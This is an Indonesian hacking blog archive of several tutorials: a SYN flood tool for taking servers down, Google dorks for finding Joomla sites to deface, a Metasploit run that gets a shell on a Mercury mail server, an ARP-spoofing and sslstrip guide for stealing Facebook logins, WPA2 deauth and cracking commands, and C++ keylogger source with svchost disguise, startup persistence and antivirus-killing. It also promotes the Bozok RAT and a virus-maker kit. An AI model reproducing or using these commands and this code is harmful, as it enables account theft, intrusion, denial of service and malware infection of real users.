Tampilkan postingan dengan label PenTesting\Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label PenTesting\Hacking. Tampilkan semua postingan
Minggu, 05 April 2015
SYN FLOOD DOS
SYN-Flood-DoS
SYN-Flood-DoS adalah tools yang digunakan hacker untuk melancarkan aksinya di dunia maya, dengan aksinya hacker menggunakan SYN-Flood-DoS agar target dapat down atau lumpuh, dengan kata lain jika anda ingin melakukan penyerangan terhadap sebuah server, baik VPN atau bukan, tidak ada salahnya untuk menggunakan SYN-Flood-DoS ini. Disamping ukuran tools yang kecil cara penggunaanya pun sangatlah mudah, anda cukup menuliskan nama target dan port target kemudian anda ekseskusi.
Link Download :Password : www.network-cyber.blogspot.com
GOOGLE DORK UNTUK COM_USER
Google Dork adalah salah satu kata kunci, untuk mempermudah pencarian menggunakan situs search engine terkenal seperti Google dan biasanya digunakan untuk mencari data-data yang tersembunyi seperti user, password dan lain lain. Google Dork biasanya dipakai oleh hacker-hacker di seluruh dunia, untuk mencari target atau kelemahan suatu Web.
Mengapa banyak orang yang Mendaface Web Joomla dengan metode ini?
Deface dengan menggunakan metode Com_User sangat sering digunakan. karena, target yang bisa di deface dengan cara ini cukup banyak dan mudah untuk dicari. apalagi anda mempunyai google dork yang berkualitas.
Elemen-Elemen yang ada pada Google Dork :
1. Inurl:
Inurl berarti kata yang terkandung dalam sebuah URL / alamat sebuah web.
2. Intext:
Intext berarti kata yang terdapat pada Template / Isi / Artikel sebuah website.
3. Intitle:
Intitle berarti kata yang terkandung pada sebuah Judul.
4. Site:
Site berarti domain yang dipakai web tersebut. (Com/Net/Org dll)
Macam-Macam Google Dork yang dipakai untuk mencari target dengan metode Com_User :
intext:Usar un nombre de usuario y contrase�a v�lido para poder tener acceso a la Administraci�n.. Joomla!� es software libre distribuido bajo la licencia GNU/GPL. Pack creado por Joomla!Spanish - 2011 - Hosting Joomla Spanish Webempresa
intitle:home page beez joomla 1.6 inurl:com/joomla
intitle:home page beez 2 inurl:com/joomla
intitle:home page beez 5 inurl:com/joomla
intitle:home page atomic inurl:com/joomla
intext:Joomla!� - ?????????? ??????????? ???????????, ???????????????? ?? ???????? GNU General Public License
???????????: ?????? Joomla! ??-??????. ??????????? ?????????: ????? ??????? ????????? Joomla! CMS inurl:/administrator
intext:Veuillez utiliser un identifiant et un mot de passe valides pour acc�der � l'administration. site:it
intext:??????? ???????????? ????? ? ?????? ??????? ? ?????? ??????????. site:ru
inurl:/administrator/index.php intext:Use a valid username and password to gain access to the administrator backend. Joomla!� is free software released under the GNU General Public License.
intitle:joomla! intext:joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
inurl:index.php/using-joomla/extensions/components/users-component/registration-form
Google Dork yang berwarna merah, memiliki kualitas tinggi.
Google Dork yang berwarna biru, memiliki kualitas sedang.
Google Dork yang berwarna oranye, memiliki kualitas rendah.
*Untuk hasil yang lebih maksimal, anda harus mengkreasikan google dork.
MELAKUKAN HACKING PADA SUATU MAIL SERVER UNTUK MENDAPATKAN SHELL
Sebelumnya penulis telah mencontohkan bagaimana cara melakukan hacking pada suatu web server dan ftp server untuk mendapatkan shell, saat ini saya akan membahas praktek cara melakukan hacking pada mail server. Fungsi Mail Server digunakan untuk menerima dan menyimpan e-mail yang masuk, nah disini saya akan mencontohkan bagaimana cara melakukan hack salah satu mail server yang mempunyai celah keamanan Buffer Overflow yaitu Mercury Mail Transport System pada versi 4.51 sehingga kita ahkirnya mendapatkan shell.
Disini IP target adalah 192.168.1.21.
Kita dapat coba scan pakai NMAP untuk mengetahui bahwa target port untuk SMTP yaitu 25 terbuka.
Dengan mengetahui port 25 terbuka itu tidak cukup, kita perlu mengetahuinya lebih jauh. Kita tunggu scan NMAP selesai dan hasilnya adalah :
Yeah ahkirnya kita mengetahui bahwa target menggunakan mail server Mercury, kita lihat dibawahnya pada port 143, ditampil service IMAPnya terlihat ada versi Mercury/32 imapd 4.51.
Kalau sudah mendapatkan informasi yang jelas dari aplikasi mail server target serta versinya, maka kita dapat cari exploitnya dan exploitnya ternyata ada di Metasploit Framework.
Berikut adalah exploitasinya :
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ � �=[ 731 exploits - 372 auxiliary - 80 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13644 updated yesterday (2011.08.26)
[-] Warning: This copy of the Metasploit Framework has been corrupted by an installed anti-virus program.
[-] We recommend that you disable your anti-virus or exclude your Metasploit installation path,
[-] then restore the removed files from quarantine or reinstall the framework. For more info:
[-] https://community.rapid7.com/docs/DOC-1273
[-]
msf exploit(mercury_cram_md5) > use exploit/windows/smtp/mercury_cram_md5
Perintah di atas kita memilih exploit mercury_cram_md5
msf exploit(mercury_cram_md5) > set PAYLOAD windows/shell/bind_tcp
Perintah di atas kita memasukkan payloadnya dan payload yang digunakan adalah shell/bind_tcp
msf exploit(mercury_cram_md5) > set RHOST 192.168.1.21
Di atas adalah perintah untuk memasukkan IP target.
msf exploit(mercury_cram_md5) > exploit
Setelah selesai, kita ketik exploit seperti diatas lalu enter.
PAYLOAD => windows/shell/bind_tcp
RHOST => 192.168.1.21
[*] Started bind handler
[*] Trying target Mercury Mail Transport System 4.51�
[*] Sending stage (240 bytes) to 192.168.1.21
[*] Command shell session 1 opened (192.168.1.22:2763 -> 192.168.1.21:4444) at 2011-08-28 06:39:50 -0700
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\MERCURY>
Binggo kita mendapatkan shell di komputer target melalui celah pada mail server
HACK AKUN FACEBOOK DENGAN KALI LINUX

Pertama-tama siapkan tool yang akan kita gunakan
Arpspoof
Sslstrip-0.9
OS Linux 32 Bit
Setelah semua tool yang di butuhkan sudah tersedia lakukan langkah berikut (jika paket belum terinstal) :
1) Buka Terminal kemudian ketikkan : wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
2) Kemudian extract file dengan cara : tar zxvf sslstrip-0.9.tar.gz
3) Ok sekarang kita masuk ke dalam folder baru dari file yang telah kita extract tadi : cd sslstrip-0.9
4) Dan untuk menginstal ketikkan : python setup.py install
Lakukan langkah berikut ( Jika paket sudah terinstall )
Gunakan cara ini setiap kali jika ingin mencuri password lagi
1) Pertama hidupkan terlebih dahulu port untuk memforward : echo ’1′ > /proc/sys/net/ipv4/ip_forward
2) Kemudian cari gateway atau pintu dari jaringan yang akan kita sadap dengan cara : netstat -nr
3) sekarang kita reset port http ke port 8080, ketikan : iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
4) Mulai menyadap dengn cara : arpspoof -i wlan0 192.168.0.1 ( 192.168.0.1) adalah gateway dari jaringan yang saya gunakan, gantilah gateway tersebut dengan gateway yang anda temukan dari netstat -nr tadi)
5) Kemudian buka terminal baru lalu ketikkan : sslstrip -l 8080 untuk mengaktifkan cookies yang akan kita baca
6) Set up is complete!! Ok sekarang kita telah menyadap akses jaringan yang melewati gateway.
7) jika anda ingin melihat akses kemana sajakah itu gunakan perintah : tail -f sslstrip.log
8) dan saat ada seseorang melakuakn login entah facebook yahoo gmail atau apapun yang menggunakan username dan password WALAAA kita akan mengetahuinya.
karena akan memakan waktu yang cukup lama karena harus menunggu ada seseorang yang mlakukan login jadi kita harus bersabar. dan itupun akan muncul script yang cukup banyak. gunakan perintah find "pass: tanpa petik agar kita lebih mudah menemukannya
HANYA UNTUK PENGETAHUAN, JANGAN DI SALAH GUNAKAN YA KAWAN :D
sekian Tricks Hacking dari saya, semoga berhasil gan :D
MEMBUAT CRUNCH/ LIST PASSWORD DI KALI LINUX
Hal pertama yang perlu kalian lakukan adalah membuka terminal dan menuliscd /pentest/passwords/crunch
lalu ketikkan peintah
more charset.lstmaka akan muncul pilihan charset yang ingin kalian gunakan
numeric = [0123456789]
numeric-space = [0123456789 ]
symbols14 = [!@#$%^&*()-_+=]
symbols14-space = [!@#$%^&*()-_+= ]
symbols-all = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
symbols-all-space = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
ualpha = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
ualpha-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ]
ualpha-numeric = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ualpha-numeric-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
ualpha-numeric-symbol14 = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-
_+=]
ualpha-numeric-symbol14-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-
_+= ]
ualpha-numeric-all = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-
_+=~`[]{}|\:;"'<>,.?/]
ualpha-numeric-all-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-
_+=~`[]{}|\:;"'<>,.?/ ]
lalpha = [abcdefghijklmnopqrstuvwxyz]
disana terdapat banyak sekali character alphabet dan numeric atau symbol tekan enter sampai more 100%
Disini saya contohkan akan membuat wordlist alphabet kecil,nomer,dan simbol
jadi saya menggunakan charset lalpha-numeric-symbol14
./crunch 1 5 -f charset.lst lalpha-numeric-symbol14 -o TrojanzBoy.lst
keterangan
1 = memulai wordlist dengan 1karakter sampai 5 kata
5 = banyaknya karakter sampai 5 karakter
lalpha-numeric-symbol14 = wordlist menggunakan alphabet,nomer,dan symbol
-o dvil.lst = hasil keluaran wordlist
dan hail outputnya bisa dilihat pada pentest/paswords/crunch
atau membuat kata yang ingin kalian gunakan misal kata admin
./crunch 10 10 -t admin@@@@@ lalpha -o TrojanzBoy.lst
keterangan
10 10 = jumlah karakter untuk pengacakan kata (admin@@@@@)
@@@@@ = pengacakan random kata terdiri dari 5 karakter bisa di rubah sesuai keingginan misal 6 karakter berarti @@@@@@
lalpha = wordlist alphabet untuk pengacakan pada @@@@@
-o dvil.lst = hasil dari wordlist
Atau menggunakan simpel pengacakan kata admin
./crunch 5 5 admin -o TrojanzBoy.lstIni akan menginstruksikan crunch untuk membuat wordlist yang akan memiliki panjang minimal karakter 5, panjang maksimum karakter 5 dengan karakter admin dan akan menyimpannya pada file txt
HASIL OUTPUTNYA AKAN DISIMPAN DI DIRECTORY /pentest/passwords/crunch
CARA CRACK PASSWORD WPA DENGAN LINUX
Setelah anda puas berhasil menghack WEP dengan Backtrack kini anda akan saya bawa untuk mengetahui cara hacking WLAN / Hotspot yang berenkripsi WPA.ok langsung ya
buka terminal pada backtrack
lalu hidupkan mode monitornya disini interface saya wlan0
airmon-ng start wlan0setelah aktif mode monitornya sekarang waktunya scanning wifi yang akan di bobol passwordnya
ketikkan perintah
airodump-ng mon0
terus cari wifi yang terkunci dengan enkripsi wpa2
disini saya akan menyerang wifi trojanzboy@wifi
ketikkan perintah
airodump-ng -w wpa2 -c 1 --bssid 94:0C:6D:EE:C2:3F mon0
ket: -w wpa2 = hasil capturing nantinya(bisa diganti namanya)
-c 1 = channel yang digunakan broadcast hotspot
--bssid 94:0C:6D:EE:C2:3F = mac address hotspot
mon0= mode monitor interface
Jika dibarisan bawah terdapat station client yang terhubung dengan AP
selanjutnya yaitu saatnya kita mengirim perintah deauthentifikasi sebuah client yang terhubung caranya, buka terminal baru ketikan :
aireplay-ng --deauth 10 -a 94:0C:6D:EE:C2:3F -c 94:20:53:D5:09:65 mon0
Ket= --deauth 10 = mode penyerangan sampai 10x
-a = mac adress hotspot
-c = client yang terhubung hotspot yaitu
ketika mengirim perintah deauth maka si client akan terputus dari hotspot tunggu sampai client konek lagi.Dan kamu akan mendapatkan WPA handshake
ket : hacking wpa2 tidak memerlukan banyak paket seperti hack wep.Kita hanya mencari handshake nya saja
Jika belum dapat handshake lakukan deauthentifikasi client lagi biar tidak usah mengetik ulang perintahnya anda cukup menekan tombol panah atas pada keyboard untuk mengulang perintah terakhir.
Namun sayangnya data yang kita terima (dari Capturan) masih terenkripsi, saat tutorial ini dibuat software aircrack-ng belum dapat membuka enkripsi tersebut akan tetapi hanya bisa menyamakan dan mencocokan binary-nya dengan bantuan kamus.
Tunggu sampai mendapatkan WPA handshake biarkan client mengkoneksikan lagi wifinya ke hotspot yang diserang apabia client sudah konek lagi maka kamu akan mendapatkan wpa handshake
Setelah dapat handshake saatnya kita mencocokan binary yang tercapture dengan bantuan kamus, buka Terminal ketikkan
aircrack-ng -w '/root/Desktop/TrojanzBoyword.txt' wpa2-01.cap
keterangan :
-w '/root/Desktop/TrojanzBoyword.txt' = Letak wordlist/dictionary saya namakan TrojanzBoy.txt
wpa2-01.cap = hasil capture pada airodump-ng tadi
tunggu sampai wordlist/kamus mencocokkan hasil capturing tadi apabia berhasil maka kunci/key akan terpecahkan
Untuk memecahkan password wpa2 harus menggunakan wordlist atau kamus yang benar-benar akurat dan dibutuhkan kesabaran
apabila anda tidak punya wordlist bisa gunakan crunch atau yang lainya
cara menggunkan crunch bisa dilihat di http://trojanzboy.blogspot.com/2012/11/membuat-wordlist-akurat-dengan-crunch.html
Senin, 23 Maret 2015
SOURCE CODE KEYLOGGER C++
ebelumnya saya telah membahas fungsi dan tools analisa malware, sekarang saya akan berbagi source keylogger saya untuk sekedar pembelajaran kita dan pemahaman kita tentang cara kerja sebuah malware yang termasuk kategori keylogger supaya kita lebih terbuka dan memahami.
Apa itu keylogger?
Mungkin dibeberapa artikel disini telah dibahas apa itu keylogger,namun untuk lebih jelasnya,saya coba jelaskan sekali lagi ya =)
Keylogger dapat digunakan untuk kepentingan yang baik atau bahkan bisa digunakan untuk kepentingan yang jahat. Kepentingan yang baik antara lain untuk memantau produktivitas karyawan, untuk penegakan hukum dan pencarian bukti kejahatan. Kepentingan yang buruk antara lain pencurian data dan password. (wikipedia)
Beberapa kelebihan keylogger pada artikel ini?
- Keylogger berbasis API,full written in C++,mudah dikembangkan.
- Size keylogger yang relatif kecil, hanya 20-30 KB tanpa dikompresi.
- Mempunyai fitur self copy,auto startup,memonitoring proses yang aktif dan mengakhiri proses yang dapat membahayakan keylogger
- Tidak mempunyai GUI, sehingga tidak tampak di Tab App pada task manager
- No dependency, tidak usah membawa �beban� seperti keylogger yang dibuat dengan VB classic
- Silahkan ditambah sendiri
PROJECT KEYLOGGER
Mari kita mulai,pertama download Project Keylogger disini http://www.mediafire.com/?eb13zlbb80ic6r9
Oke, setelah anda download, bisa anda coba atau me-rebuild ulang projek tersebut. Saya asumsikan keylogger sudah berfungsi dan anda memahaminya, LOG file yang dibuat tidak serapih LOG file keylogger master MrHpx, sehingga anda bisa memodifikasi lagi sesuai keinginan anda.
Lanjut ke tahap pembuatan fungsi lainnya untuk membuat keylogger yang lebih powerfull
AutoStartup dan Self Copy
Untuk menambahkan fungsi autostartup,kita menggunakan fungsi sebagai berikut untuk mengakses dan menulis key pada registry:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | //registry char myname[500],tmpdir[500]; HKEY hKey; DWORD dwFlags; //======================== extern int __argc; extern char **__argv; ATOM MyRegisterClass(HINSTANCE hInstance); LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM); __declspec(dllexport) LRESULT CALLBACK KeyEvent (int pHookCode, WPARAM pParamW, LPARAM pParamL); //EP section //registry function void RegWriteString(HKEY hKey, LPCTSTR lpSubKey, LPCTSTR lpValueName, LPCTSTR lpData) { int ret = 0; HKEY phkResult = (HKEY)malloc(255); ret = RegCreateKey(hKey, lpSubKey, &phkResult); ret = RegSetValueEx(phkResult, lpValueName, 0, REG_SZ, (BYTE*)lpData, strlen(lpData)); RegCloseKey(hKey); return; } |
Mendapatkan path asli dari keylogger, kemudian mencopy dirinya sendiri ke direktori windows dengan nama svchost kemudian membuat key untuk auto startup:
1 2 3 4 5 6 7 8 9 | //create startup and copying files char szCurrent[MAX_PATH]; char szPath[MAX_PATH]; GetModuleFileName(NULL,szCurrent, MAX_PATH-1); GetWindowsDirectory(szPath, sizeof(szPath)); strcat(szPath, "\\"); strcat(szPath,"svchost.exe"); CopyFile(szCurrent, szPath, true); RegWriteString(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\Currentversion\\Run", "svchost system", szPath); |
1 2 3 | // Jika didebug, maka akan keluar if(IsDebuggerPresent() == TRUE) ExitProcess(0); |
Preprocessor
1 | #include tlhelp32.h |
1 2 | DWORD WINAPI terminator(LPVOID Param); DWORD id = 0; |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | //fungsi proses killer HANDLE hProcessSnap; HANDLE hProcess; PROCESSENTRY32 pe32; void KillProc(char * szProcess) { hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pe32.dwSize = sizeof(PROCESSENTRY32); Process32First(hProcessSnap, &pe32); //lakukan pengulangan sampai dapat :D while(Process32Next(hProcessSnap, &pe32)) { if(!strcmp(pe32.szExeFile, szProcess)) { hProcess = OpenProcess(PROCESS_TERMINATE, 0, pe32.th32ProcessID); TerminateProcess(hProcess, 0); } } CloseHandle(hProcess); CloseHandle(hProcessSnap); } |
1 2 3 4 5 6 7 8 9 10 11 12 | //killer proses DWORD WINAPI terminator(LPVOID Param) { while(1) { Sleep(1000); KillProc("regedit.exe"); KillProc("taskman.exe"); KillProc("PCMAV.exe"); } return EXIT_SUCCESS; } |
1 | CreateThread(NULL, 0, &terminator, NULL, 0, &id); |
Mengapa tidak membuat file .cpp baru dan menulis fungsi di file tsb? Hemmm.. Karena pada DevC++, pewarisan kelas membuat size program anda membengkak 100%. Entah mengapa, tidak seperti visual c++ buatan microsoft yang sudah dibekali optimasi pada kompilernya.
Mungkin dari anda, ada yang bertanya. Bagaimana dengan fungsi send lognya via e-mail? Owh itu tergantung kreativitas anda. Banyak referensinya.. hehe
Akhir kata,selamat ber-coding dan berimajinasi =)
DAFTAR PLUGIN CELAH KEAMANAN DI WORDPRESS
Komunitas dan organisasi wordpress di Indonesia (wordpress.or.id) mengumumkan beberapa plugin WordPress yang teridentifikasi mengandung celah keamanan yang dapat dimanfaatkan orang lain untuk menyusupkan file ke blog kita. Namun pada BLOG tercinta ini, kami tambahkan daftar lengkap plugins wordpress yang memiliki celah keamanan pada tahun 2012 ini.Berikut ini daftar wordpress exploit, wordpress vulnerabilities list, sql injection wordpress, wordpress vulnerabilities scanner, wordpress vulnerabilities 2012, wordpress security vulnerabilities, wordpress hacking, wordpress hacking 2012, wordpress hacking, wordpress hacked, wordpress hacking attacks.
Metode XSS
- WordPress DX-Contribute Plugin 1.1.0 � XSS
- Post-views plugin 2.6.1. � XSS
- WP e-Commerce 1.1.1 � XSS
- WordPress WooCommerce Predictive Search Plugin 1.0.6. � XSS
- Video Lead Form 0.5 � XSS
- Pretty Link Lite Plugin 1.6.0 � XSS
- WP125 plugin 1.4.5. XSS
- Ultimate TinyMCE plugin 3.6. � XSS
- Wysija Newsletters Plugin 2.1.7. � XSS
- WordPress Carousel Slideshow 3.10 � XSS
- BuddyStream plugin 2.6.2 � XSS
- NextGEN Gallery 1.9.7 � XSS
- Amazon Associate plugin 2.0 � XSS
- Hitasoft FLV Player Plugin 1.1 SQL Injection
- AJAX Post Search Plugin 1.1 � SQL Injection
- Advanced Custom Fields Plugin 3.5.2. � Arbitrary file inclusion
- vTiger CRM Lead Capture 1.1.0. � unspecified errors
- WP-Filebase Plugin 0.2.9.24. � unspecified errors
Berikut Daftar Lengkap WordPress Plugin Yang Memiliki Celah Keamanan 2012:
- Welcart e-Commerce December 14, 2012
- Knews Multilingual Newsletters December 14, 2012
- Bulk update many plugins added December 7, 2012
- All Video Gallery November 2, 2012
- WordPress Spider Catalog November 2, 2012
- Slideshow ( jquery image gallery) Plugin November 2, 2012
- FoxyPress Plugin November 2, 2012
- GRAND FlAGallery Plugin October 28, 2012
- FireStorm Professional Real Estate October 28, 2012
- WordPress Poll Plugin October 28, 2012
- Thank You Counter October 28, 2012
- UnGallery plugin October 28, 2012
- Zingiri Bookings plugin October 28, 2012
- WordPress Wordfence Plugin October 23, 2012
- WordPress White Label CMS October 22, 2012
- Download Shortcode Plugin October 22, 2012
- Pinterest �Pin It� Button Lite October 6, 2012
- Spider Calendar October 6, 2012
- ABC Test September 27, 2012
- Token Manager plugin September 27, 2012
- Sexy Add Template September 27, 2012
- Notices Ticker September 27, 2012
- WP-TopBar September 21, 2012
- MF Gig Calendar September 21, 2012
- Answer-my-question September 21, 2012
- Cloudsafe365 August 29, 2012
- Image news slider August 29, 2012
- Count Per Day plugin August 29, 2012
- Zingiri Web Shop August 22, 2012
- Mz-jajak August 15, 2012
- Postie August 13, 2012
- Vitamin Plugin August 9, 2012
- G-Lock Double Opt-in August 3, 2012
- GD Star Rating July 26, 2012
- Mac Photo Gallery plugin July 26, 2012
- Backup July 26, 2012
- Flexi Quote Rotator July 26, 2012
- Get Off Malicious Scripts July 26, 2012
- LeagueManager plugin July 18, 2012
- Resume Submissions & Job Postings July 18, 2012
- Paid Memberships Pro July 16, 2012
- Global Content Blocks July 16, 2012
- The Guardian News Feed plugin July 11, 2012
- WP Symposium July 11, 2012
- Leaflet Maps Marker July 11, 2012
- Artiss Code Embed July 11, 2012
- Front-end Editor July 11, 2012
- WP Socializer July 8, 2012
- PHPFreeChat plugin July 8, 2012
- Knews Multilingual Newsletters July 8, 2012
- Contus Vblog plugin July 8, 2012
- Custom tables plugin July 8, 2012
- Church_admin Plugin July 7, 2012
- MoodThingy plugin July 7, 2012
- Quick Post Widget July 7, 2012
- Email newsletter July 7, 2012
- Quotes Collection Plugin July 4, 2012
- Count Per Day plugin July 4, 2012
- Zingiri Web Shop July 4, 2012
- Job Manager June 29, 2012
- N-Media Mailchimp June 24, 2012
- TheCartPress plugin June 21, 2012
- Zingiri Web Shop June 17, 2012
- Kk Star Ratings June 17, 2012
- Easy Contact Forms Export June 17, 2012
- WpStoreCart June 17, 2012
- MAC PHOTO GALLERY June 17, 2012
- Top Quark Architecture June 17, 2012
- Tinymce Thumbnail Gallery June 17, 2012
- WP-Property June 9, 2012
- Front End Upload June 9, 2012
- FoxyPress June 9, 2012
- WordPress VideoWhisper Video Presentation June 9, 2012
- Omni Secure Files Plugin June 9, 2012
- HTML5 AV Manager Plugin June 9, 2012
- Google Maps Via Store Locator Plus June 9, 2012
- WordPress Font Uploader June 9, 2012
- MM Forms Community June 9, 2012
- ALO EasyMail Newsletter May 31, 2012
- WordPress WassUp Plugin May 21, 2012
- WP Easy Gallery Plugin May 17, 2012
- WP Easy Gallery Plugin May 17, 2012
- GRAND Flash Album May 17, 2012
- WordPress CataBlog Plugin May 17, 2012
- WordPress Dynamic Widgets Plugin May 17, 2012
- WordPress Network Publisher May 16, 2012
- WordPress WP Forum Server May 16, 2012
- Media Library Categories Plugin May 16, 2012
- PDF & Print Button Joliprint Plugin May 16, 2012
- CodeStyling Localization May 16, 2012
- 2 Click Social Media Buttons May 16, 2012
- WordPress Newsletter Manager Plugin May 16, 2012
- Mingle Forum May 16, 2012
- SoundCloud Is Gold May 16, 2012
- Subscribe2 May 16, 2012
- WP-FaceThumb May 15, 2012
- User Photo Plugin May 11, 2012
- Zingiri Web Shop May 3, 2012
- ShareYourCart Plugin April 27, 2012
- WordPress Sharebar Plugin April 23, 2012
- WP Survey And Quiz Tool April 23, 2012
- Zingiri Web Shop April 23, 2012
- WordPress Download Manager April 23, 2012
- Sh-slideshow April 14, 2012
- WP Marketplace Plugin April 11, 2012
- Nmedia Users File Uploader April 11, 2012
- Another WordPress Classifieds Plugin April 5, 2012
- BuddyPress April 5, 2012
- CMS Tree Page March 27, 2012
- WordPress Image News slider March 26, 2012
- Blaze Slideshow March 26, 2012
- WordPress Carousel Slideshow Plugin March 26, 2012
- Video Embed & Thumbnail Generator Plugin February 27, 2012
- Magn WP Drag and Drop Upload February 27, 2012
- SB Uploader February 27, 2012
- WordPress Absolute Privacy Plugin February 27, 2012
- S2Member Pro WordPress membership plugin February 27, 2012
- AllWebMenus WordPress Menu Plugin January 26, 2012
- Theme Tuner January 26, 2012
- WP e-Commerce January 26, 2012
- My Calendar Plugin January 26, 2012
- uCan Post plugin January 26, 2012
- NextGEN Gallery January 26, 2012
- Count Per Day Plugin January 16, 2012
- Pay With Tweet Plugin January 16, 2012
- Whois Search Plugin January 4, 2012
- TheCartPress Plugin January 4, 2012
- Connections January 2, 2012
- WP Symposium January 2, 2012
Semoga menjadi informasi yang bermanfaat dan dapat digunakan untuk memperbaiki wordpress masing-masing
REMOTE ADMINISTRATION TOOL- BOZOK RAT
Sharing sebuah tools yaitu remote administration tools (RAT) untuk windows, dimana aplikasi ini bisa berjalan di platform XP-Win8. Kemampuan tools Bozok ini cukup lumayan dimana dilengkapi dengan mematikan dan menghidupkan proses, mengatur services, keylogger dan webcam live capture.
Menu-menu dan fungsi-fungsi yang tersedia sebagai berikut:
- Filemanager:
- Download/Upload File
- Rename File
- Delete File
- Execute File
- Hidden
- Visible
- Create Folder
Bozok 1.0.1 - Processmanager
- Terminate Process
Bozok Screen - Windowmanager
- Close Window
- Maximize/Minimize
- Servicemanager
- Stop Service
- Pause Service
- Resume Service
- Start Service
- Installation
- Doesnt fire up UAC
- Compitable with XP-Windows7 (both architectures)
- Startup
- Melt
- Mutex Check
- Unicode compatible
- Remote Desktop
- Control mouse/keyboad
- Keylogger
Bozok RAT � BinusHacker
- Webcam
Bozok RAT � BinusHacker
Lebih detail cara penggunaannya bisa dilihat di Video Tutorial Bozok RAT
Download Tools Selengkapnya:
ANDROID WORDPRESS VULN SCANNER
Kali ini kita akan share sebuah tools yang berguna untuk melakukan testing keamanan terhadap situs yang berbasis wordpress. Dimana hasil dari scan bisa dilihat berupa report dan dikirimkan ke email.Berikut penampakannya:

aWPVSCAN adalah Android WordPress Vulnerability Scanner yaitu aplikasi android ditulis dalam ruby dibuat untuk menemukan kelemahan yang terdapat dalam website yang berbasis WordPress. Dimaksudkan menggunakannya untuk untuk profesional keamanan atau administrator WordPress untuk menilai seberapa besar keamanan website WordPress mereka.
* Tested on Samsung Galaxy Nexus, Jelly Bean 4.1.2
Link download : Google Play
Mirror : Indowebster password:israelserverisdown
MEMBUAT VIRUS DENGAN TERABIT VIRUS MAKER
Siapa bilang membuat virus itu susah ?Sekarang anda bisa membuat virus dari yang paling simple sampe Trojan yang dapat merusak sistem.
Oke, skrg saya akan beri penjelasannya dulu��� Cekidot gan��
1. Informasi Software:
- Software ini dibuat oleh orang Iran. berita tersebut juga belum pasti kebenarannya, tetapi saya mencoba search di google.com dan saya mendapat info yang menyebutkan bahwa software TeraBit Virus Maker adalah asli buatan Iran, dan itu pun dalam versi 3.1 . Dalam versi 3.1 sampai yang sebelumnya, software ini belum support untuk Windows 7, hanya support pada Sistem Operasi sebelum Windows 7, seperti: Windows XP,Vista. Disini saya memiliki Software TeraBit Virus Maker versi 3.2 yang telah support dengan Windows 7.
- Software ini berfungsi untuk membuat virus secara instan dengan kemampuan yang bisa kita pilih sendiri sehingga user dapat menggunakannya dengan mudah dan cepat. Di dalam software tersebut telah disediakan fitur-fitur yang bisa kita gunakan dalam pembuatan virus, ada 54 fitur yang bisa kita gunakan, saya hanya akan menyebutkan 15 fitur saja dan untuk fitur yang lain bisa dilihat di gambar. 15 fitur itu adalah:
1. Avoid Opening Calculator
2. Avoid Opening Copy,Move Window
3. Avoid Opening Gpedit
4. Avoid Opening Media Player
5. Avoid Opening Mozzila Firefox
6. Avoid Opening MsConfig
7. Avoid Opening Notepad
8. Avoid Opening Wordpad
9. Avoid Opening Yahoo Messenger
10. Add 30 User Accounts to Windows
11. Always Clean Clipboard
12. Always Log Off
13. Close Internet Explorer Every 10 sec
14. Delete All Files In Desktop
15. Delete All Files In My Documents
File virus ini ber-ekstensi *.exe . Jadi, ketika file virus ini dieksekusi, maka fitur-fitur yang telah ditambahkan, akan berjalan dan mengubah pengaturan system computer anda sesuai dengan fitur yang anda pilih.
Dan ada item-item yang bisa digunakan untuk melengkapi kesempurnaan dari virus yang anda buat, seperti:
- Binder berfungsi untuk mengeksekusi/menjalankan file yang kita kaitkan dengan virus yang anda buat, file yang bisa dikaitkan bisa dalam format apa saja, sperti file gambar, file word, exel, powerpoint, music, notepad, dan lain-lain.
- Fake Error Message berfungsi untuk memunculkan pesan palsu yang kita buat sendiri, dan sub-itemnya ada title, message, dan type. Title isi judul pesan, Message isi dengan pesan kalian sendiri, dan type, pilih tipe yang anda inginkan.
- Run Custom Command (ini belum saya coba sebelumnya)
- Add [ ] fake KB(s) to virus berfungsi untuk menambahkan kapasitas palsu ke dalam file virus tersebut.
- File name after install adalah file yang sebenarnya berjalan, saat file palsu tersebut dieksekusi, disana terdapat tipe/ekstensi *.exe yang bisa digunakan.
- File Icon adalah item yang digunakan untuk memilih icon file virus tersebut.
- File Name adalah item yang digunakan untuk memberi nama pada file tersebut.
- Run Virus with Windows adalah item yang berfungsi untuk menjalankan file pada windows.
- [R] adalah tombol reset, untuk mereset ulang pengaturan yang telah dipilih ke pengaturan defaultnya
- Create Virus berfungsi untuk membuat file virus yang telah kita rancang sebelumnya.
- Install deepfreeze untuk menjaga agar komputer anda aman.
- Disable Antivirus anda, karena software ini dianggap sebagai virus oleh antivirus.
- Jalankan Software tVirusMaker.exe
- Pilih/ceklist fitur-fitur yang telah disediakan dan pilih item-item yang akan digunakan.
